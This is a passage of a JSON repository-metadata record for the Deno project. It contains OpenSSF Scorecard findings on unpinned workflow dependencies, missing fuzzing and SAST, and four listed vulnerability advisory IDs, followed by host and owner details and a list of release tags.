https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hos